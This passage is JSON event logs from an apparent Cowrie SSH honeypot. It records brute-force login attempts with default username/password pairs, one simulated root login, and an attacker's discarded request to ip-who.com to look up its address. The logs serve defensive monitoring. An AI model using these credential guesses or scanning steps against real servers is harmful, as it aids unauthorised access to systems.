y1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:33.444215Z","src_ip":"212.227.235.229","session":"5198d02b0ec8"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:34.744821Z","src_ip":"212.227.235.229","session":"38c165470ddd"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:35.349557Z","src_ip":"212.227.235.229","session":"5198d02b0ec8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:36.633681Z","src_ip":"212.227.235.229","session":"5198d02b0ec8"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:37.956262Z","src_ip":"212.227.235.229","session":"7accdd7cb10f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51010,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ae035cb230a","protocol":"ssh","message":"New connection: 212.227.125.160:51010 (1.2.3.4:22) [session: 8ae035cb230a]","sensor":"my-vps","timestamp":"2025-08-31T04:45:38.858763Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:38.859604Z","src_ip":"212.227.125.160","session":"8ae035cb230a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:39.044572Z","src_ip":"212.227.125.160","session":"8ae035cb230a"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:39.594117Z","src_ip":"212.227.125.160","session":"8ae035cb230a"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:40.351591Z","src_ip":"212.227.235.229","session":"7accdd7cb10f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:40.777739Z","src_ip":"212.227.125.160","session":"8ae035cb230a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52890,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0787b7cafc","protocol":"ssh","message":"New connection: 212.227.235.229:52890 (1.2.3.4:22) [session: cc0787b7cafc]","sensor":"my-vps","timestamp":"2025-08-31T04:45:41.075755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:41.163587Z","src_ip":"212.227.235.229","session":"cc0787b7cafc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:41.410522Z","src_ip":"212.227.235.229","session":"cc0787b7cafc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52906,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce806ccab5e5","protocol":"ssh","message":"New connection: 212.227.235.229:52906 (1.2.3.4:22) [session: ce806ccab5e5]","sensor":"my-vps","timestamp":"2025-08-31T04:45:43.673785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:43.679326Z","src_ip":"212.227.235.229","session":"ce806ccab5e5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:43.933536Z","src_ip":"212.227.235.229","session":"ce806ccab5e5"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:45:45.349925Z","src_ip":"212.227.235.229","session":"cc0787b7cafc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T04:45:46.010708Z","session":"cc0787b7cafc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T04:45:46.364163Z","src_ip":"212.227.235.229","session":"cc0787b7cafc"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:46.456475Z","src_ip":"212.227.235.229","session":"ce806ccab5e5"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:46.852240Z","src_ip":"212.227.235.229","session":"cc0787b7cafc"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:47.711315Z","src_ip":"212.227.235.229","session":"ce806ccab5e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35116,"dst_ip":"1.2.3.4","dst_port":22,"session":"454bcde25351","protocol":"ssh","message":"New connection: 212.227.125.160:35116 (1.2.3.4:22) [session: 454bcde25351]","sensor":"my-vps","timestamp":"2025-08-31T04:45:48.157020Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59128,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e28a78a7993","protocol":"ssh","message":"New connection: 212.227.125.160:59128 (1.2.3.4:22) [session: 9e28a78a7993]","sensor":"my-vps","timestamp":"2025-08-31T04:45:50.277878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-31T04:45:51.504530Z","src_ip":"212.227.125.160","session":"9e28a78a7993"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:52.071757Z","src_ip":"212.227.125.160","session":"454bcde25351"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:52.073332Z","src_ip":"212.227.125.160","session":"454bcde25351"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-31T04:45:52.605713Z","src_ip":"212.227.125.160","session":"9e28a78a7993"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56720,"dst_ip":"1.2.3.4","dst_port":22,"session":"0254670fe836","protocol":"ssh","message":"New connection: 212.227.125.160:56720 (1.2.3.4:22) [session: 0254670fe836]","sensor":"my-vps","timestamp":"2025-08-31T04:45:54.914896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:54.915763Z","src_ip":"212.227.125.160","session":"0254670fe836"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:45:55.104781Z","src_ip":"212.227.125.160","session":"0254670fe836"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:55.672760Z","src_ip":"212.227.125.160","session":"0254670fe836"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:58.099995Z","src_ip":"212.227.125.160","session":"0254670fe836"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:45:58.910010Z","src_ip":"212.227.125.160","session":"9e28a78a7993"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:45:58.936265Z","src_ip":"212.227.125.160","session":"454bcde25351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45256,"dst_ip":"1.2.3.4","dst_port":22,"session":"f45f7ea4e46f","protocol":"ssh","message":"New connection: 212.227.235.229:45256 (1.2.3.4:22) [session: f45f7ea4e46f]","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.118412Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46710,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6b4ab7d9005","protocol":"ssh","message":"New connection: 212.227.235.229:46710 (1.2.3.4:22) [session: f6b4ab7d9005]","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.336107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.537757Z","src_ip":"212.227.235.229","session":"f6b4ab7d9005"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.638824Z","src_ip":"212.227.235.229","session":"f6b4ab7d9005"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:45:59.827147Z","src_ip":"212.227.235.229","session":"f45f7ea4e46f"}
